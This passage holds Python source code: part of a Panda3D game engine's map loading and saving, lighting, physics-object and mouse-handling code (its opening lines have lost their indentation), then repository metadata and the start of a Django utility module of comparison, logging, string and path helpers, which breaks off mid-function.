colors = [Vec4(0.5, 0.0, 0.0, 1), Vec4(0.0, 0.0, 0.5, 1), Vec4(0, 0.5, 0, 1), Vec4(0.5, 0.5, 0, 1)]
for i in range(numTeams):
team = entities.TeamEntity()
team.color = colors[i]
docks = [x for x in aiWorld.docks if x.teamIndex == i]
if len(docks) > 0:
team.setDock(docks[0])
entityGroup.spawnEntity(team)
entityGroup.addTeam(team)
if len(tokens) > 2: # x vs. y
# Set up allies. First team is allied with even teams, second team with odd.
i = 2
while i < len(entityGroup.teams):
entityGroup.teams[0].addAlly(entityGroup.teams[i].getId())
i += 2
i = 3
while i < len(entityGroup.teams):
entityGroup.teams[1].addAlly(entityGroup.teams[i].getId())
i += 2
elif tokens[0] == "navmesh":
aiWorld.navMesh = ai.NavMesh(mapDirectory, tokens[1])
elif tokens[0] == "survival":
self.isSurvival = True
numTeams = 4
if net.netMode == net.MODE_SERVER:
colors = [Vec4(0.4, 0.0, 0.0, 1), Vec4(0.0, 0.0, 0.4, 1), Vec4(0, 0.4, 0, 1), Vec4(0.4, 0.4, 0, 1)]
for i in range(4):
team = entities.TeamEntity()
team.money = 300 # Starting money amount for survival
team.color = colors[i]
team.isSurvivors = True
entityGroup.spawnEntity(team)
entityGroup.addTeam(team)
for team in entityGroup.teams:
for team2 in entityGroup.teams:
team.addAlly(team2.getId())
elif tokens[0] == "glass":
if net.netMode == net.MODE_SERVER:
# Glass pane
glass = entities.Glass(aiWorld.world, aiWorld.space)
glass.initGlass(aiWorld.world, aiWorld.space, float(tokens[1]), float(tokens[2]))
glass.setPosition(Vec3(float(tokens[3]), float(tokens[4]), float(tokens[5])))
glass.setPosition(glass.getPosition())
glass.setRotation(Vec3(float(tokens[6]), float(tokens[7]), float(tokens[8])))
entityGroup.spawnEntity(glass)
elif tokens[0] == "water":
# Enable reflection rendering
reflectionEffectsNeeded = True
distortionEffectsChanged()
maker = CardMaker("waterNode")
maker.setFrame(-self.worldSize, self.worldSize, -self.worldSize, self.worldSize)
self.waterNode = render.attachNewNode(maker.generate())
self.waterNode.setHpr(0, -90, 0)
self.waterNode.setPos(0, 0, float(tokens[1])) # Second token is water height
self.waterNode.setShader(loader.loadShader("images/water.sha"))
self.waterNode.setTransparency(TransparencyAttrib.MAlpha)
self.waterNode.setShaderInput("watermap", loader.loadTexture("images/water-normal.jpg"))
self.waterNode.setShaderInput("time", clock.time)
self.waterNode.hide(BitMask32.bit(4))
self.waterPlane = Plane(Vec3(0, 0, 1), Point3(0, 0, float(tokens[1])))
self.waterPlaneNode = PlaneNode("waterPlaneNode")
self.waterPlaneNode.setPlane(self.waterPlane)
self.waterPlaneNodePath = render.attachNewNode(self.waterPlaneNode)
self.waterPlaneNodePath.hide()
clipPlaneAttrib = ClipPlaneAttrib.make()
clipPlaneAttrib = clipPlaneAttrib.addOnPlane(self.waterPlaneNodePath)
if reflectionCamera != None:
self.waterNode.setShaderInput("reflectionscreen", reflectionRenderTexture)
reflectionCamera.node().setInitialState(RenderState.make(CullFaceAttrib.makeReverse(), clipPlaneAttrib))
elif tokens[0] == "geometry":
# Setup static geometry
geom = StaticGeometry(aiWorld.space, mapDirectory, tokens[1])
geom.setPosition(Vec3(float(tokens[2]), float(tokens[3]), float(tokens[4])))
geom.commitChanges()
self.addStaticGeometry(geom)
elif tokens[0] == "geometry-scenery":
# Setup static geometry
geom = StaticGeometry(aiWorld.space, mapDirectory, tokens[1])
geom.setPosition(Vec3(float(tokens[2]), float(tokens[3]), float(tokens[4])))
geom.commitChanges()
geom.node.show()
self.addStaticGeometry(geom)
elif tokens[0] == "skybox":
if not isDaemon:
self.skyBox = loadModel("models/skyboxes/" + tokens[1])
self.skyBox.setScale(self.worldSize)
self.skyBoxCustomModel = True
self.skyBoxFilename = tokens[1]
self.skyBox.setPos(camera.getPos(render))
self.skyBox.setBin('background', 0)
self.skyBox.setDepthWrite(0)
self.skyBox.setDepthTest(0)
self.skyBox.setClipPlaneOff()
self.skyBox.setTwoSided(True)
self.skyBox.setShaderOff()
self.skyBox.reparentTo(render)
elif tokens[0] == "sound":
if not isDaemon:
self.ambientSound = audio.FlatSound(mapDirectory + "/" + tokens[1], float(tokens[2]))
self.ambientSound.setLoop(True)
self.ambientSound.play()
elif tokens[0] == "light":
if tokens[1] == "objects":
parentNode = renderObjects
elif tokens[1] == "environment":
parentNode = renderEnvironment
else:
parentNode = renderLit
if tokens[2] == "directional":
light = Spotlight(tokens[3])
lens = PerspectiveLens()
lens.setFov(45)
light.setExponent(0)
light.setLens(lens)
light.setColor(Vec4(float(tokens[4]), float(tokens[5]), float(tokens[6]), 1))
lightNode = parentNode.attachNewNode(light)
lightNode.setTag("type", "directional") # We can look this up later when we go to save, to differentiate between spotlights and directionals
lightNode.setHpr(float(tokens[7]), float(tokens[8]), float(tokens[9]))
lightNode.setPos(render.getRelativeVector(lightNode, Vec3(0, 1, 0)) * -self.worldSize * 2.25)
if len(tokens) >= 11 and tokens[10] == "shadow" and hasattr(light, "setShadowCaster"):
lightNode.setTag("shadow", "true")
if enableShadows:
light.setShadowCaster(True, shadowMapWidth, shadowMapHeight)
light.setCameraMask(BitMask32.bit(4))
else:
lightNode.setTag("shadow", "false")
parentNode.setLight(lightNode)
self.lights.append(lightNode)
elif tokens[2] == "ambient":
light = AmbientLight(tokens[3])
light.setColor(Vec4(float(tokens[4]), float(tokens[5]), float(tokens[6]), 1))
lightNode = parentNode.attachNewNode(light)
parentNode.setLight(lightNode)
self.lights.append(lightNode)
elif tokens[2] == "point":
light = PointLight(tokens[3])
light.setColor(Vec4(float(tokens[7]), float(tokens[8]), float(tokens[9]), 1))
light.setAttenuation(Vec3(float(tokens[10]), float(tokens[11]), float(tokens[12])))
lightNode = parentNode.attachNewNode(light)
lightNode.setPos(float(tokens[4]), float(tokens[5]), float(tokens[6]))
parentNode.setLight(lightNode)
self.lights.append(lightNode)
elif tokens[2] == "spot":
light = Spotlight(tokens[3])
lens = PerspectiveLens()
lens.setFov(float(tokens[16]))
light.setExponent(float(tokens[17]))
light.setLens(lens)
light.setColor(Vec4(float(tokens[10]), float(tokens[11]), float(tokens[12]), 1))
light.setAttenuation(Vec3(float(tokens[13]), float(tokens[14]), float(tokens[15])))
lightNode = parentNode.attachNewNode(light)
lightNode.setPos(float(tokens[4]), float(tokens[5]), float(tokens[6]))
lightNode.setHpr(float(tokens[7]), float(tokens[8]), float(tokens[9]))
if hasattr(light, "setShadowCaster") and len(tokens) >= 19 and tokens[18] == "shadow":
light.setShadowCaster(True, 2048, 2048)
light.setCameraMask(BitMask32.bit(4))
parentNode.setLight(lightNode)
lightNode.setTag("type", "spot") # We can look this up later when we go to save, to differentiate between spotlights and directionals
self.lights.append(lightNode)
elif tokens[0] == "dock":
dock = Dock(aiWorld.space, int(tokens[1]))
pos = Vec3(float(tokens[2]), float(tokens[3]), float(tokens[4]))
dock.setPosition(pos)
normal = Vec3(0, 0, 1)
queue = aiWorld.getCollisionQueue(Vec3(pos.getX(), pos.getY(), pos.getZ()), Vec3(0, 0, -1))
for i in range(queue.getNumEntries()):
entry = queue.getEntry(i)
if entityGroup.getEntityFromEntry(entry) != None:
continue
normal = entry.getSurfaceNormal(render)
break
dock.setRotation(Vec3(0, math.degrees(-math.atan2(normal.getY(), normal.getZ())), math.degrees(math.atan2(normal.getX(), normal.getZ()))))
aiWorld.docks.append(dock)
elif tokens[0] == "physicsentity":
if net.netMode == net.MODE_SERVER:
file = tokens[1] + ".txt"
data = readPhysicsEntityFile(file)
parts = tokens[1].rpartition("/")
directory = mapDirectory + "/" + parts[0]
obj = entities.PhysicsEntity(aiWorld.world, aiWorld.space, data, directory, tokens[1])
obj.setPosition(Vec3(float(tokens[2]), float(tokens[3]), float(tokens[4])))
obj.setRotation(Vec3(float(tokens[5]), float(tokens[6]), float(tokens[7])))
obj.controller.commitLastPosition()
entityGroup.spawnEntity(obj)
elif tokens[0] == "spawnpoint":
# Setup spawn point
geom = SpawnPoint(aiWorld.space)
geom.setPosition(Vec3(float(tokens[1]), float(tokens[2]), float(tokens[3])))
geom.setRotation(Vec3(float(tokens[4]), float(tokens[5]), float(tokens[6])))
aiWorld.spawnPoints.append(geom)
elif tokens[0] == "scenery":
scenery = loadModel(mapDirectory + "/" + tokens[1])
scenery.setPos(float(tokens[2]), float(tokens[3]), float(tokens[4]))
scenery.reparentTo(renderLit)
self.sceneries[tokens[1]] = scenery
# Create winnar platforms
entry = aiWorld.getFirstCollision(Vec3(0, 0, 100), Vec3(0, 0, -1))
height = 15
if entry != None:
height = entry.getSurfacePoint(render).getZ() + 10.0
for i in range(numTeams):
p = Platform(aiWorld.space)
spacing = 7
vspacing = 2
offset = spacing / -2 if numTeams % 2 == 0 else 0
p.setPosition(Vec3((math.ceil(i / 2.0) * (((i % 2) * 2) - 1) * spacing) + offset, 0, height + (numTeams - 1 - i) * vspacing))
p.commitChanges()
p.hide()
self.platforms.append(p)
def save(self, aiWorld, entityGroup):
"Saves a basic representation of the current game state (including environment resources) to a map file."
class MapFile:
def __init__(self):
self.data = ""
def write(self, line):
self.data += line
mapFile = MapFile()
mapFile.write("world " + str(self.worldSize) + "\n")
if aiWorld.navMesh != None:
mapFile.write("navmesh " + aiWorld.navMesh.filename + "\n")
index = 0
for dock in aiWorld.docks:
if dock.active:
pos = dock.getPosition()
mapFile.write("dock " + str(index) + " " + str(pos.getX()) + " " + str(pos.getY()) + " " + str(pos.getZ()) + "\n")
index += 1
if self.isSurvival:
mapFile.write("survival\n")
else:
if len(entityGroup.teams[0].getAllies()) > 0:
mapFile.write("teams " + str(len(entityGroup.teams[0].getAllies()) + 1) + " " + str(len(entityGroup.teams[1].getAllies()) + 1) + "\n")
else:
mapFile.write("teams " + str(len(entityGroup.teams)) + "\n")
for geom in self.staticGeometries.values():
pos = geom.getPosition()
keyword = "geometry"
if not geom.node.isHidden():
keyword = "geometry-scenery"
mapFile.write(keyword + " " + geom.filename + " " + str(pos.getX()) + " " + str(pos.getY()) + " " + str(pos.getZ()) + "\n")
if self.skyBox != None:
mapFile.write("skybox " + self.skyBoxFilename + "\n")
if self.ambientSound != None:
mapFile.write("sound " + self.ambientSound.filename.replace(self.mapDirectory + "/", "") + " " + str(self.ambientSound.getVolume()) + "\n")
if self.waterNode != None:
mapFile.write("water " + str(self.waterNode.getZ()) + "\n")
for light in self.lights:
color = light.getNode(0).getColor()
mapFile.write("light ")
if light.getNode(0).getParent(0) == renderObjects:
mapFile.write("objects ")
elif light.getNode(0).getParent(0) == renderEnvironment:
mapFile.write("environment ")
else:
mapFile.write("all ")
if isinstance(light.getNode(0), AmbientLight):
mapFile.write("ambient " + light.getName() + " " + str(color.getX()) + " " + str(color.getY()) + " " + str(color.getZ()) + "\n")
elif isinstance(light.getNode(0), Spotlight):
# Could be a real spotlight, or it could be a directional light, since we fake those.
if light.getTag("type") == "directional":
mapFile.write("directional " + light.getName() + " " + str(color.getX()) + " " + str(color.getY()) + " " + str(color.getZ()) + " " + str(light.getH()) + " " + str(light.getP()) + " " + str(light.getR()) + (" shadow" if light.node().isShadowCaster() else "") + "\n")
else:
pos = light.getPos(render)
atten = light.getNode(0).getAttenuation()
fov = light.getNode(0).getLens().getFov()
exponent = light.getNode(0).getExponent()
mapFile.write("spot " + light.getName() + " " + " " + str(pos.getX()) + " " + str(pos.getY()) + " " + str(pos.getZ()) + " " + str(light.getH()) + " " + str(light.getP()) + " " + str(light.getR()) + " " + str(color.getX()) + " " + str(color.getY()) + " " + str(color.getZ()) + " " + str(atten.getX()) + " " + str(atten.getY()) + " " + str(atten.getZ()) + " " + str(fov) + " " + str(exponent) + " " + (" shadow" if light.getTag("shadow") == "true" else "") + "\n")
elif isinstance(light.getNode(0), PointLight):
atten = light.getNode(0).getAttenuation()
pos = light.getPos(render)
mapFile.write("point " + light.getName() + " " + str(pos.getX()) + " " + str(pos.getY()) + " " + str(pos.getZ()) + " " + str(color.getX()) + " " + str(color.getY()) + " " + str(color.getZ()) + " " + str(atten.getX()) + " " + str(atten.getY()) + " " + str(atten.getZ()) + "\n")
for sceneryFile in self.sceneries.keys():
pos = self.sceneries[sceneryFile].getPos(render)
mapFile.write("scenery " + sceneryFile + " " + str(pos.getX()) + " " + str(pos.getY()) + " " + str(pos.getZ()) + "\n")
for obj in (entity for entity in entityGroup.entities.values() if isinstance(entity, entities.PhysicsEntity)):
pos = obj.getPosition()
hpr = obj.node.getHpr()
mapFile.write("physicsentity " + obj.dataFile + " " + str(pos.getX()) + " " + str(pos.getY()) + " " + str(pos.getZ()) + " " + str(hpr.getX()) + " " + str(hpr.getY()) + " " + str(hpr.getZ()) + "\n")
for glass in (entity for entity in entityGroup.entities.values() if isinstance(entity, entities.Glass)):
pos = glass.getPosition()
hpr = glass.getRotation()
mapFile.write("glass " + str(glass.glassWidth) + " " + str(glass.glassHeight) + " " + str(pos.getX()) + " " + str(pos.getY()) + " " + str(pos.getZ()) + " " + str(hpr.getX()) + " " + str(hpr.getY()) + " " + str(hpr.getZ()) + "\n")
for point in aiWorld.spawnPoints:
if point.active:
pos = point.getPosition()
rot = point.getRotation()
mapFile.write("spawnpoint " + str(pos.getX()) + " " + str(pos.getY()) + " " + str(pos.getZ()) + " " + str(rot.getX()) + " " + str(rot.getY()) + " " + str(rot.getZ()) + "\n")
stream = open(self.filename, "w")
stream.write(mapFile.data)
stream.close()
def update(self):
"Updates the custom sounds and the skybox associated with this Map."
if self.skyBox != None:
camPos = camera.getPos(render)
self.skyBox.setPos(camPos - Vec3(0, 0, 25))
if self.waterNode != None:
self.waterNode.setShaderInput("time", clock.time)
if reflectionCamera != None:
reflectionCamera.setMat(base.camera.getMat() * self.waterPlane.getReflectionMat())
def delete(self):
"Releases all resources, including scenery, physics geometries, and environment sounds and lights."
global map
map = None
if self.skyBox != None:
self.skyBox.removeNode()
for scenery in self.sceneries.values():
scenery.removeNode()
self.sceneries.clear()
for geom in self.staticGeometries.values():
self.deleteStaticGeometry(geom)
self.staticGeometries.clear()
for p in self.platforms:
p.delete()
del self.platforms[:]
for light in self.lights:
light.getParent().clearLight(light)
light.removeNode()
if self.waterNode != None:
self.waterNode.removeNode()
del self.lights[:]
if reflectionCamera != None:
reflectionCamera.node().setActive(False)
if self.ambientSound != None:
self.ambientSound.stop()
del self.ambientSound
class StaticGeometry(DirectObject):
    "A StaticGeometry is a potentially invisible, immovable physics object, modeled as a trimesh."
    def __init__(self, space, directory, filename=None):
        # Fix: validate explicitly instead of `assert`, which is stripped when
        # Python runs with -O.
        if filename is None:
            raise ValueError("StaticGeometry requires a filename")
        self.filename = filename
        self.node = loadModel(directory + "/" + self.filename)
        self.node.reparentTo(renderEnvironment)
        # Hidden by default: plain "geometry" map entries are invisible colliders.
        self.node.hide()
        self.node.setCollideMask(BitMask32(1))
        # Build the ODE collision trimesh from the visual model.
        triMeshData = OdeTriMeshData(self.node, True)
        self.geometry = OdeTriMeshGeom(space, triMeshData)
        self.geometry.setCollideBits(BitMask32(0x00000001))
        self.geometry.setCategoryBits(BitMask32(0x00000001))
        space.setSurfaceType(self.geometry, 0)
    def setPosition(self, pos):
        "Moves both the physics geom and the visual node."
        self.geometry.setPosition(pos)
        self.node.setPos(pos)
    def getPosition(self):
        "Returns the physics geom's position (the authoritative one)."
        return self.geometry.getPosition()
    def setRotation(self, hpr):
        "Rotates the node, then mirrors the resulting quaternion onto the geom."
        self.node.setHpr(hpr)
        self.geometry.setQuat(self.node.getQuat(render))
    def getRotation(self):
        return self.node.getHpr()
    def commitChanges(self):
        "Updates the NodePath to reflect the position of the ODE geometry."
        self.node.setPosQuat(renderEnvironment, self.getPosition(), Quat(self.geometry.getQuaternion()))
class SpawnPoint(DirectObject):
    "Marks a location for units to spawn."
    def __init__(self, space):
        # `space` is unused here; kept for signature parity with the other
        # map objects that are constructed from (space, ...).
        self.node = loadModel("models/spawnpoint/SpawnPoint")
        self.node.reparentTo(renderEnvironment)
        # Inactive points are skipped when the map is saved.
        self.active = True
    def setPosition(self, pos):
        self.node.setPos(pos)
    def getPosition(self):
        return self.node.getPos()
    def setRotation(self, hpr):
        self.node.setHpr(hpr)
    def getRotation(self):
        return self.node.getHpr()
    def delete(self):
        # Mark inactive and release the cached model.
        self.active = False
        deleteModel(self.node, "models/spawnpoint/SpawnPoint")
class Dock(SpawnPoint):
    "Docks have a one-to-one relationship with Teams. Their Controllers increment the team's money and spawn newly purchased units."
    def __init__(self, space, teamIndex):
        # Deliberately does not chain to SpawnPoint.__init__ -- the dock loads
        # its own model and adds a translucent shield dome around it.
        self.teamIndex = teamIndex
        self.active = True
        self.radius = 6    # shield dome scale
        self.vradius = 2   # vertical offset between node origin and dock surface
        self.node = loadModel("models/dock/Dock")
        self.node.reparentTo(renderEnvironment)
        self.shieldNode = loadModel("models/shield/shield")
        self.shieldNode.reparentTo(self.node)
        self.shieldNode.setScale(self.radius)
        self.shieldNode.setTwoSided(True)
        self.shieldNode.setShaderOff(True)
        self.shieldNode.setColor(0.8, 0.9, 1.0, 0.6)
        self.shieldNode.setTransparency(TransparencyAttrib.MAlpha)
        self.shieldNode.hide(BitMask32.bit(4)) # Don't cast shadows
    def setPosition(self, pos):
        # The node origin sits vradius below the advertised dock position.
        self.node.setPos(pos - Vec3(0, 0, self.vradius))
    def getPosition(self):
        return self.node.getPos() + Vec3(0, 0, self.vradius)
class Platform(DirectObject):
    "Makes a platform upon which to parade the game winners."
    def __init__(self, space):
        self.node = loadModel("maps/platform")
        self.node.reparentTo(renderEnvironment)
        self.collisionNode = CollisionNode("cnode")
        self.collisionNode.addSolid(CollisionSphere(0, 0, 0, 5))
        self.collisionNodePath = self.node.attachNewNode(self.collisionNode)
        self.collisionNode.setCollideMask(BitMask32(1))
        # A separate, simplified model supplies the ODE collision trimesh.
        odeCollisionNode = loadModel("maps/platform-geometry")
        triMeshData = OdeTriMeshData(odeCollisionNode, True)
        self.geometry = OdeTriMeshGeom(space, triMeshData)
        self.geometry.setCollideBits(BitMask32(0x00000001))
        self.geometry.setCategoryBits(BitMask32(0x00000001))
        space.setSurfaceType(self.geometry, 0)
    def setPosition(self, pos):
        "Moves both the physics geom and the visual node."
        self.geometry.setPosition(pos)
        self.node.setPos(pos)
    def getPosition(self):
        return self.geometry.getPosition()
    def setRotation(self, hpr):
        self.node.setHpr(hpr)
        self.geometry.setQuaternion(self.node.getQuat(render))
    def getRotation(self):
        return self.node.getHpr()
    def show(self):
        "Enables collisions and reattaches the platform to the scene."
        self.geometry.enable()
        self.node.reparentTo(renderEnvironment)
    def hide(self):
        "Disables collisions and detaches the platform from the scene."
        self.geometry.disable()
        self.node.reparentTo(hidden)
    def delete(self):
        # Fix: release the model this class actually loads ("maps/platform");
        # the original passed the SpawnPoint model path instead.
        deleteModel(self.node, "maps/platform")
        self.geometry.destroy()
    def commitChanges(self):
        "Updates the NodePath to reflect the position of the ODE geometry."
        self.node.setPosQuat(renderEnvironment, self.getPosition(), Quat(self.geometry.getQuaternion()))
class Mouse:
    """A mouse can be created by any object that needs it (usually a controller).
    However, there should only be one mouse active at a time, since each Mouse object will recenter the cursor every frame."""
    # Class-wide switch: when False (cursor shown), update() is a no-op.
    enabled = True
    def __init__(self):
        # Take control away from Panda's default camera/mouse coupling.
        base.disableMouse()
        # Seed the "previous" pointer position with the window centre.
        # NOTE(review): this codebase targets Python 2, where int / 2 is
        # integer division -- confirm before porting to Python 3.
        self._lastX = base.win.getProperties().getXSize() / 2
        self._lastY = base.win.getProperties().getYSize() / 2
        self._x = 0
        self._y = 0
        # Base scale applied to raw pixel deltas; `speed` is the user multiplier.
        self.baseSpeed = 0.001
        self.speed = 1
        self._dx = 0
        self._dy = 0
        # Vertical axis is clamped; the default bound is pi/2 (presumably
        # radians of pitch -- verify against the camera controller).
        self._maxY = math.pi * 0.5
        self._minY = -self._maxY
        self.lastUpdate = 0
    def setYLimit(self, maxY, minY):
        # Adjust the vertical clamp used in update().
        self._maxY = maxY
        self._minY = minY
    def setSpeed(self, speed):
        "Sets the sensitivity of the mouse."
        self.speed = speed
    def update(self):
        "Updates the mouse's position and speed, then recenters the cursor in the window."
        if not Mouse.enabled:
            return
        self.lastUpdate = clock.time
        pointer = base.win.getPointer(0)
        mouseX = pointer.getX()
        mouseY = pointer.getY()
        # Scaled deltas since the last frame; Y is inverted so that moving the
        # mouse up yields a positive dy.
        self._dx = (mouseX - self._lastX) * self.baseSpeed * self.speed
        self._dy = -(mouseY - self._lastY) * self.baseSpeed * self.speed
        self._lastX = mouseX
        self._lastY = mouseY
        self._x += self._dx
        # Clamp the vertical accumulator between the configured limits.
        self._y = min(self._maxY, max(self._minY, self._y + self._dy))
        centerX = base.win.getProperties().getXSize() / 2
        centerY = base.win.getProperties().getYSize() / 2
        # Recentre the cursor; only adopt the new origin if the OS accepted it.
        if base.win.movePointer(0, centerX, centerY):
            self._lastX = centerX
            self._lastY = centerY
    def setX(self, x):
        self._x = x
    def setY(self, y):
        self._y = y
    def getX(self):
        return self._x
    def getDX(self):
        return self._dx
    def getDY(self):
        return self._dy
    def getY(self):
        return self._y
    @staticmethod
    def showCursor():
        # Disable mouse-look and reveal the OS cursor.
        Mouse.enabled = False
        props = WindowProperties()
        props.setCursorHidden(False)
        base.win.requestProperties(props)
    @staticmethod
    def hideCursor():
        # Re-enable mouse-look, hide the cursor, and recentre it so the next
        # update() does not see a huge delta.
        Mouse.enabled = True
        props = WindowProperties()
        props.setCursorHidden(True)
        base.win.requestProperties(props)
        base.win.movePointer(0, base.win.getProperties().getXSize() / 2, base.win.getProperties().getYSize() / 2)
class Light:
    """At this time, only point lights are supported. Really though, what do you need a spotlight for?
    This class is necessary because every time a Panda3D light is added, all shaders must be regenerated.
    This class keeps a constant number of lights active at all times, but sets the unnecessary extra lights to have no effect."""
    def __init__(self, color, attenuation):
        # Copy the vectors so callers can't mutate our state from outside.
        self.color = Vec4(color)
        self.attenuation = Vec3(attenuation)
        self.position = Vec3(0, 0, 0)
        # Slot borrowed from the global lightNodes pool while active, else None.
        # Indexing below shows each slot is a pair: [0] the light object
        # (color/attenuation), [1] its NodePath (position).
        self.node = None
    def setPos(self, pos):
        self.position = Vec3(pos)
        if self.node != None:
            self.node[1].setPos(self.position)
    def setColor(self, color):
        self.color = Vec4(color)
        if self.node != None:
            self.node[0].setColor(self.color)
    def setAttenuation(self, attenuation):
        "Attenuation is a 3D vector containing quadratic, linear, and constant attenuation coefficients."
        self.attenuation = Vec3(attenuation)
        if self.node != None:
            self.node[0].setAttenuation(self.attenuation)
    def add(self):
        "Adds this light to the active light list, basically enabling it."
        if not self in lights:
            lights.append(self)
        # Claim a pooled node only when one is free and we don't already hold one.
        if len(lights) <= len(lightNodes) and self.node == None:
            self.node = lightNodes[len(lights) - 1]
            self.node[1].setPos(self.position)
            self.node[0].setColor(self.color)
            self.node[0].setAttenuation(self.attenuation)
    def remove(self):
        "Removes this light from the active light list, disabling it."
        if self in lights:
            lights.remove(self)
        if self.node != None:
            # Black out the pooled light instead of detaching it, so shaders
            # are not regenerated (see class docstring).
            self.node[0].setColor(Vec4(0, 0, 0, 1))
            self.node[0].setAttenuation(Vec3(0, 0, 1))
            self.node = None
def impulseToForce(fx, fy = None, fz = None):
    """Converts an impulse to a force by dividing by the timestep of the last ODE frame.

    Call with three components for a vector result, or with a single scalar
    (fy/fz omitted) for a scalar result.
    """
    if fy is not None and fz is not None:
        force = Vec3(fx, fy, fz)
        return force / clock.timeStep
    else:
        return fx / clock.timeStep
def frange(start, end=None, inc=None):
    """A range function that accepts float increments.

    Mirrors range(): frange(stop), frange(start, stop), frange(start, stop, inc).
    Values are produced by repeated addition, so float rounding accumulates the
    same way as the original implementation. Returns [] for an empty range
    (the original indexed into an empty list and raised IndexError).
    """
    if end is None:
        end = start + 0.0
        start = 0.0
    else:
        start += 0.0  # force float arithmetic
    if inc is None:
        inc = 1.0
    count = int(math.ceil((end - start) / inc))
    values = []
    current = start
    for _ in range(count):
        values.append(current)
        current += inc
    return values
def lerp(a, b, scale):
    "Interpolate between two Vec3's, based on the 'scale' parameter, where 'scale' goes from 0 to 1."
    delta = b - a
    return a + (delta * scale)
| {
"content_hash": "49ad52a508a2370051e326a0a6d6408d",
"timestamp": "",
"source": "github",
"line_count": 1052,
"max_line_length": 467,
"avg_line_length": 35.70342205323194,
"alnum_prop": 0.6960330138445154,
"repo_name": "etodd/a3p",
"id": "c7546d5760a12ba79c117162194ecfbe0546cdaa",
"size": "37560",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/engine.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "2056"
},
{
"name": "PHP",
"bytes": "3901"
},
{
"name": "Python",
"bytes": "374487"
},
{
"name": "Shell",
"bytes": "1084"
}
],
"symlink_target": ""
} |
import os, re, json
from django.utils.encoding import smart_str
from django.utils import six
from protoExt.utils.utilsConvert import slugify2
def compare_dictionaries(dict1, dict2):
    """Deep-compare two dicts, recursing into nested dicts and lists.

    Returns False when either argument is None or not a dict, or when keys
    or values differ; list values are compared element-wise via compare_lists.
    """
    if dict1 is None or dict2 is None:
        return False
    if type(dict1) is not dict or type(dict2) is not dict:
        return False
    if dict1.__eq__(dict2):
        return True
    # Fix: the original intersected dict2's keys with themselves, so two dicts
    # of equal size but different keys passed this gate and raised KeyError below.
    shared_keys = set(dict1.keys()) & set(dict2.keys())
    if not (len(shared_keys) == len(dict1.keys()) and len(shared_keys) == len(dict2.keys())):
        return False
    dicts_are_equal = True
    for key in dict1.keys():
        if type(dict1[key]) != type(dict2[key]):
            dicts_are_equal = False
        elif type(dict1[key]) is dict:
            dicts_are_equal = compare_dictionaries(dict1[key], dict2[key])
        elif type(dict1[key]) is list:
            dicts_are_equal = compare_lists(dict1[key], dict2[key])
        else:
            dicts_are_equal = (dict1[key] == dict2[key])
        if not dicts_are_equal:
            return False
    return dicts_are_equal
def compare_lists(list1, list2):
    """Minimal list comparison.

    Lists must be the same length. An element also counts as matching when it
    appears anywhere in the other list (membership short-circuit); otherwise
    elements are compared positionally, recursing into dicts and lists.
    """
    if len(list1) != len(list2):
        return False
    if not list1:
        return True
    if list1.__eq__(list2):
        return True
    for idx, item in enumerate(list1):
        # Membership short-circuit: an element present anywhere in list2 matches.
        if item in list2:
            continue
        other = list2[idx]
        if type(item) != type(other):
            matched = False
        elif type(item) is dict:
            matched = compare_dictionaries(item, other)
        elif type(item) is list:
            matched = compare_lists(item, other)
        else:
            matched = (item == other)
        if not matched:
            return False
    return True
def traceError():
    """Report the exception currently being handled.

    In DEBUG the full traceback is printed to stderr; otherwise it is appended
    to the configured LOG_FILE. Settings are imported lazily so the module can
    be loaded before Django is configured.
    """
    from django.conf import settings
    if settings.DEBUG:
        import traceback
        traceback.print_exc()
    else:
        import logging
        # NOTE(review): basicConfig only takes effect on its first call in a
        # process; later calls with a different LOG_FILE are silently ignored.
        logging.basicConfig( filename = settings.LOG_FILE, level=logging.DEBUG)
        logging.info("Exception has occured" ,exc_info=1)
def random_string_generator(size=6, chars=None):
    """Return a random string of *size* characters drawn from *chars*
    (uppercase ASCII letters when no alphabet is given)."""
    import string, random
    pool = chars or string.ascii_uppercase
    return ''.join(random.choice(pool) for _ in range(size))
def verifyList(obj, defList = None):
    """Coerce *obj* (JSON string, tuple, or list) into a list.

    Admin objects are mostly tuples; converting them to lists makes them
    easier to work with. Anything else collapses to []. When the result is
    empty and *defList* was provided, *defList* is returned instead.
    """
    if isinstance(obj, six.string_types):
        try:
            obj = json.loads(obj)
        except ValueError:
            # Fix: narrowed from a bare `except:`; json.loads on a string fails
            # with ValueError (JSONDecodeError is a subclass of it).
            obj = []
    elif isinstance(obj, tuple):
        obj = list(obj)
    if not isinstance(obj, list):
        obj = []
    if defList is not None and len(obj) == 0:
        return defList
    return obj
def verifyStr( vrBase , vrDefault ):
    """Return vrBase when truthy, otherwise vrDefault, coerced to unicode text."""
    return u'%s' % (vrBase or vrDefault)
def parseEmailAddress(fullemail, delimitorLeft = '<', delimitorRight = '>'):
    """
    split a full name/email pair to name/email tuple
    matches :
    # julien@bouquillon.com
    # Julien Bouquillon <julien@bouquillon.com>

    Returns (name, email) -- email falls back to name for a bare address --
    or None when nothing matches.
    """
    # Fix: the original only hand-escaped parentheses; re.escape handles any
    # delimiter that is a regex metacharacter (and leaves '<'/'>' alone).
    left = re.escape(delimitorLeft)
    right = re.escape(delimitorRight)
    reg = re.compile('([^%s\n]+) ?%s?([^%s\r\n]+)?%s?' % (left, left, right, right))
    matches = reg.findall(fullemail)
    if matches:
        (name, email) = matches[0]
        if email == '':
            email = name
        return (name, email)
    return None
def guessNextPath(dst, slugify2 = True, idx = 0, checkExists = True):
    """ return a renamed path if provided one already exists
    if slugify2, file name is slugified first (fs encodings problems quick & dirty workaround)

    Fix: the boolean parameter `slugify2` shadowed the imported slugify2
    function, so `slugify2(file)` called True(...) and raised TypeError on
    every idx == 0 call; the flag was also never honored.
    """
    newpath = dst
    if idx == 0:
        (path, fname) = os.path.split(newpath)
        (fname, ext) = os.path.splitext(fname)
        if slugify2:
            # Local aliased import so the flag parameter (kept for API
            # compatibility) does not shadow the real function.
            from protoExt.utils.utilsConvert import slugify2 as _slugify2
            fname = _slugify2(fname)
        newpath = os.path.join(path, '%s%s' % (fname, ext))
    if checkExists and os.path.isfile(newpath):
        idx += 1
        name, ext = os.path.splitext(newpath)
        newpath = '%s-copy%s' % (name, ext)
        return guessNextPath(newpath, slugify2, idx, checkExists)
    return newpath
def unique_id(more = ''):
    """Build a loosely-unique identifier: current timestamp plus two random
    integers, joined with dashes, with *more* appended verbatim.
    Not cryptographically secure."""
    import time
    import random
    parts = [str(time.time()),
             str(random.randint(2000, 10000)),
